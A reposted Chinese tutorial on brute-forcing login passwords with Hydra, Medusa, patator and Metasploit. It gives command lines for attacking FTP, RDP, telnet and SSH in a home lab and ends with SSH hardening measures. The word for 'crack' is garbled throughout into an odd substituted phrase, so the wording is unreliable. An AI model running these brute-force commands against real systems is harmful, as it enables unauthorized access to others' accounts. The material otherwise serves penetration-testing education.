前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >密码–暴力激活成功教程

密码–暴力激活成功教程

作者头像
全栈程序员站长
发布2022-09-23 10:52:07
6850
发布2022-09-23 10:52:07
举报
文章被收录于专栏:全栈程序员必看

大家好,又见面了,我是你们的朋友全栈君。

1.海德拉(Hydra)

hydra 是世界顶级密码暴力密码激活成功教程工具,支持几乎所有协议的在线密码激活成功教程,功能强大,其密码能否被激活成功教程关键取决 于激活成功教程字典是否足够强大,在网络安全渗透过程中是一款必备的测试工具。

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

激活成功教程ftp: hydra -L 用户名字典 -P 密码字典 -t 6 -e ns IP地址 -v 激活成功教程https: hydra -m /index.php -l 用户名 -P 密码字典.txt IP地址 https 激活成功教程http-proxy: hydra -l admin -P 字典.txt http-proxy://IP地址 激活成功教程rdp(windows远程登录): hydra ip地址 rdp -l administrator -P 密码字典.txt -V telnet激活成功教程: hydra ip地址 telnet -l 用户字典.txt -P 密码字典.txt

我们先建立简单的字典

在这里插入图片描述
在这里插入图片描述

我们在win7创建了一个属于telnet服务的用户bilibili,密码为123456(如何创建和开启telnet服务请看我相关博客)

在这里插入图片描述
在这里插入图片描述

对我们win7系统进行简单的密码暴力激活成功教程

在这里插入图片描述
在这里插入图片描述

输出为

在这里插入图片描述
在这里插入图片描述

成功

2.Medusa

Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力激活成功教程工具。可以同时对多个主机,用户或密码执行强力测试。Medusa和hydra一样,同样属于在线密码激活成功教程工具。Medusa是支持AFP, CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare),NNTP,PcAnywhere, POP3, PostgreSQL, rexec, RDP、rlogin, rsh, SMBNT,SMTP(AUTH/VRFY),SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC、Generic Wrapper以及Web表单的密码爆破工具

Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

-h ———–[TEXT] 目标主机名称或者IP地址 -H ———–[FILE] 包含目标主机名称或者IP地址文件 -u ———-[TEXT] 测试的用户名 -U ———[FILE] 包含测试的用户名文件 -p ——[TEXT] 测试的密码 -P ——-[FILE] 包含测试的密码文件 -C ———[FILE] 组合条目文件 -O ——–[FILE] 日志信息文件 -e ——-[n/s/ns] n代表空密码,s代表为密码与用户名相同 -M ——-[TEXT] 模块执行名称 -m ——-[TEXT] 传递参数到模块 -d ———-显示所有的模块名称 -n ——–[NUM] 使用非默认Tcp端口 -s ——-启用SSL -r ———[NUM] 重试间隔时间,默认为3秒 -t ——–[NUM] 设定线程数量 -T ———–同时测试的主机总数 -L ——–并行化,每个用户使用一个线程 -f ——–在任何主机上找到第一个账号/密码后,停止激活成功教程 -F ——-在任何主机上找到第一个有效的用户名/密码后停止审计 -q ———显示模块的使用信息 -v ———[NUM] 详细级别(0-6) -w ——–[NUM] 错误调试级别(0-10) -V ——–显示版本 -Z ———[TEXT] 继续扫描上一次

我们先创建一个hostlist.txt文档,用同样的方式进行激活成功教程

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

结果:

在这里插入图片描述
在这里插入图片描述

3.patator 强大的命令行暴力激活成功教程器

在这里插入图片描述
在这里插入图片描述

例1:

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

例2:

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

4.msf

Metasploit Framework(简称MSF)是一个编写、测试和使用exploit代码的完善环境。这个环境为渗透测试, Shellcode编写和漏洞研究提供了一个可靠的平台,这个框架主要是由面向对象的Perl编程语言编写的,并带有由C语 言,汇编程序和Python编写的可选组件。

在这里插入图片描述
在这里插入图片描述

1.ssh模块 root@kali:~# msfconsole msf > search ssh

在这里插入图片描述
在这里插入图片描述

2.SSH用户枚举 msf > use auxiliary/scanner/ssh/ssh_enumusers msf auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 192.168.64.129 msf auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /root/userlist.txt msf auxiliary(scanner/ssh/ssh_enumusers) > set rport 23 msf auxiliary(scanner/ssh/ssh_enumusers) > set PASS_FILE /root/passwordlist.txt msf auxiliary(scanner/ssh/ssh_enumusers) > run

在这里插入图片描述
在这里插入图片描述

这里输出和想象不一样,可能是这是ssh服务,不是telnet服务 其他的可以用show options 来查看并依次设置参数 3.ssh版本探测 msf > use auxiliary/scanner/ssh/ssh_version msf auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.64.129 msf auxiliary(scanner/ssh/ssh_version) > run

4.ssh暴力激活成功教程 msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(scanner/ssh/ssh_login) > set rhosts 192.168.64.129 msf auxiliary(scanner/ssh/ssh_login) > set USER_FILE /root/userlist.txt msf auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /root/passwordlist.txt msf auxiliary(scanner/ssh/ssh_login) > run

5.对暴力激活成功教程的防御措施

  1. useradd shell [root@kali219]# useradd yangge -s /sbin/nologin
  2. 密码的复杂性 字母大小写+数字+特殊字符+20位以上+定期更换
  3. 修改默认端口 /etc/ssh/sshd_config Port 33663
  4. 限止登录的用户或组 #PermitRootLogin yes AllowUser xxss [root@kali2019]# man sshd_config AllowUsers AllowGroups DenyUsers DenyGroups
  5. 使用sudo
  6. 设置允许的IP访问 /etc/hosts.allow,例如sshd:192.168.64.129:allow PAM基于IP限制 iptables/firewalld 只能允许从堡垒机
  7. 使用DenyHosts自动统计,并将其加入到/etc/hosts.deny
  8. 基于PAM实现登录限制 模块:pam_tally2.so 功能:登录统计 示例:实现防止对sshd暴力激活成功教程 [root@kali2019]# grep tally2 /etc/pam.d/sshd auth required pam_tally2.so deny=2 even_deny_root root_unlock_time=60 unlock_time=6
  9. 禁用密码改用公钥方式认证 /etc/ssh/sshd_config PasswordAuthentication no
  10. 保护xshell导出会话文件【小心】
  11. GRUB加密【针对本地激活成功教程】

发布者:全栈程序员栈长,转载请注明出处:https://javaforall.cn/172191.html原文链接:https://javaforall.cn

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 1.海德拉(Hydra)
  • 2.Medusa
  • 3.patator 强大的命令行暴力激活成功教程器
  • 4.msf
  • 5.对暴力激活成功教程的防御措施
相关产品与服务
云数据库 MySQL
腾讯云数据库 MySQL(TencentDB for MySQL)为用户提供安全可靠,性能卓越、易于维护的企业级云数据库服务。其具备6大企业级特性,包括企业级定制内核、企业级高可用、企业级高可靠、企业级安全、企业级扩展以及企业级智能运维。通过使用腾讯云数据库 MySQL,可实现分钟级别的数据库部署、弹性扩展以及全自动化的运维管理,不仅经济实惠,而且稳定可靠,易于运维。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档